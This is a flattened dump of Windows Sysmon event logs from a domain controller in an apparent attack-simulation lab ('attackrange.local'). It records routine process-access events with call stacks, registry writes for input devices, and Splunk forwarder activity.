12:02:09.661{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003963Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.661{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003962Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.661{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003961Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.661{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003960Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.661{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003959Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.661{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003958Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.661{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003957Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.661{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003956Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.661{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003955Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.661{266CAFBE-64C1-6064-9200-00000000AE01}25523220C:\Windows\system32\winlogon.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\winlogon.exe+193b7|C:\Windows\system32\winlogon.exe+22617|C:\Windows\system32\winlogon.exe+2b287|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000003954Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.667{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\System32\LogonUI.exe10.0.14393.0 (rs1_release.160715-1616)Windows Logon User Interface HostMicrosoft® Windows® Operating SystemMicrosoft Corporationlogonui.exe"LogonUI.exe" /flags:0x2 /state0:0xa3a56855 /state1:0x41c64e6dC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e72SystemMD5=B38DFCF985D8AE5B1A17C264981E61C7,SHA256=AA62D29803D52EC06CD27ED3124E034048F09606EB7342181913C9817C7B44C5,IMPHASH=A6F3A84D171E55B51A7343E05C8DFAC3{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\System32\winlogon.exewinlogon.exe 10341000x80000000000000003953Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.661{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003952Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.661{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003951Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.661{266CAFBE-646C-6064-1000-00000000AE01}11242372C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003950Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.645{266CAFBE-646C-6064-1000-00000000AE01}11242372C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+4689|c:\windows\system32\themeservice.dll+3fdd|c:\windows\system32\themeservice.dll+3c53|c:\windows\system32\themeservice.dll+2675|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003949Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.645{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003948Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.645{266CAFBE-646C-6064-1000-00000000AE01}11242372C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x147aC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\themeservice.dll+3de3|c:\windows\system32\themeservice.dll+26c0|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003947Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.645{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003946Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.536{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003945Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.536{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003944Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.536{266CAFBE-64C1-6064-9100-00000000AE01}51084108C:\Windows\system32\csrss.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\winsrv.DLL+1ef0|C:\Windows\system32\winsrv.DLL+17e9|C:\Windows\system32\winsrv.DLL+1579|C:\Windows\SYSTEM32\ntdll.dll+5182f 23542300x80000000000000003943Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.287{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9AC1A99A189C9C765785FB643D391BCC,SHA256=DAEDCB6F931D74BC6AAC1557DADB7D19F2CD367D82BE4AB05BA138521CBE0A59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003942Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.287{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E586F74CFE940CDC3FC885A129FF0975,SHA256=2CEFC3A78982D86D03A1FDB577A4A0B1AA731D72A35D782FCAD7B4F643159186,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000003941Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.240{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000003940Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:09.209{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\mouclass\Enum\NextInstanceDWORD (0x00000002) 13241300x80000000000000003939Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:09.209{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\mouclass\Enum\CountDWORD (0x00000002) 13241300x80000000000000003938Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:09.209{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\mouclass\Enum\1TERMINPUT_BUS\UMB\2&2c22bcc9&0&Session2Mouse0 13241300x80000000000000003937Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:09.209{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\NextInstanceDWORD (0x00000002) 13241300x80000000000000003936Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:09.209{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\CountDWORD (0x00000002) 13241300x80000000000000003935Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:09.209{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\1TERMINPUT_BUS\UMB\2&2c22bcc9&0&Session2Mouse0 13241300x80000000000000003934Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localInvDB-DriverVerSetValue2021-03-31 12:02:09.209{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Control\Class\{4d36e96f-e325-11ce-bfc1-08002be10318}\0001\DriverVersion10.0.14393.0 13241300x80000000000000003933Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:09.209{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Enum\NextInstanceDWORD (0x00000002) 13241300x80000000000000003932Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:09.209{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Enum\CountDWORD (0x00000002) 13241300x80000000000000003931Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:09.209{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Enum\1TERMINPUT_BUS\UMB\2&2c22bcc9&0&Session2Keyboard0 13241300x80000000000000003930Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:09.209{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\NextInstanceDWORD (0x00000001) 13241300x80000000000000003929Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:09.209{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\CountDWORD (0x00000001) 
13241300x80000000000000003928Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:09.209{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\0TERMINPUT_BUS\UMB\2&2c22bcc9&0&Session2Keyboard0 13241300x80000000000000003927Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localInvDB-DriverVerSetValue2021-03-31 12:02:09.194{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Control\Class\{4d36e96b-e325-11ce-bfc1-08002be10318}\0001\DriverVersion10.0.14393.0 10341000x80000000000000003926Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.194{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2387f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003925Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
